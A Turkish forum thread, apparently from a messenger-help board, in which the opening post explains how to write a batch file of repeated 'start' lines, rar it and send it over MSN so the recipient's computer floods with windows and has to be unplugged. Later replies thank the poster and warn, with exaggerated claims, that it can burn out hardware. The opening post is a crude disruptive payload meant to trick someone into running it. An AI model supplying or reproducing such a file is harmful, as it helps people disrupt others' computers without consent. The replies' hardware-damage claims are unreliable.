msn den düşürmek istermisiniz (karşı tarafı)

Msn, Icq, Yahoo Messenger için yardımlaşma bölümümüz.Güvenlik,ipuçları ve daha fazlası..
Kullanıcı avatarı
forever
Tecrübeli Üye
Tecrübeli Üye

msn den düşürmek istermisiniz (karşı tarafı)

Mesaj gönderen forever »

Şimdi bir not defteri açın, sonra alt alta gelecek şekilde yazabildiğiniz kadar:

start
start
start
start
start
start
start
start
start
start
start
start
yazın, ne kadar çok yazarsanız o kadar etkili olur. Daha sonra not defterini dosya menüsünden farklı kaydet yaparak x.bat olarak kaydedin.
Şimdi bunu msn den .rar layarak istediğiniz kişiyi düşürün. Ne kadar start yazarsanız o kadar sayfa açılacak ve kişi bunları kapatamayacağı için fiş çekmek zorunda kalacaktır

not: sizin bundan kurtulmanız için ctrl+alt+delete yaparak pencereleri tutup; görevi sonlandırarak kurtulabilirsiniz...

Kullanıcı avatarı
efsanekurt
Aktif Üye
Aktif Üye

Mesaj gönderen efsanekurt »

saolasın kardeşş ALLAH RAZI OLSUN GÜZEL BİŞMİŞŞ GÜL GÜL ÖLDÜM

Kullanıcı avatarı
sanalyama
Aktif Üye
Aktif Üye

Mesaj gönderen sanalyama »

bunu fazla yapıp gönderirsen ekran kartını yakarsın dikkatli olmak lazım ne paylaştığını bilmek lazım ne kadar "start" yazarsan o kadar dos komutu açılır ve işlemciyi bilem gümletebilirsin

Kullanıcı avatarı
VSaBaH
Tasarımcı Yönetici
Tasarımcı Yönetici

Mesaj gönderen VSaBaH »

sanalyama, bilgilendirdiğin için sağol.. Sizin bölüm neydi. Okuyor msunuz? Yoksa çalışıyor msunuz??

Aslında forumumuzda beni tanıyor msunuz? bölümü var oraya kendinizi tanıtsanız herkes tanır sizi.. :D
 !
REKLAMLARA YAPILAN TIKLAMA BİZİM TEK GELİR KAPIMIZDIR. LÜTFEN ADBLOCK TARZI EKLENTİLERLE REKLAMLARI ENGELLEMEYELİM. BİZE EN GÜZEL TEŞEKKÜRÜ BU ŞEKİLDE YAPABİLİRSİNİZ. TEŞEKKÜRLER...

Resim

Kullanıcı avatarı
bbb
Aktif Üye
Aktif Üye

Mesaj gönderen bbb »

he he geröekmi iyi baam denemeden hemen güzel demem denedikten sonra sana ayrıntılı bilgiyi ben veririm ha tmm anlaştık ha yok canım öle yağma hemen iyi neydiyon şimdi sen olurmu bi denede ondan sora söle canım ya olmaz sa ha nolacak o zaman boşubşuna milleti böle konuşturuyon ha neyse canım gene görüşürük ha ok canımsss.........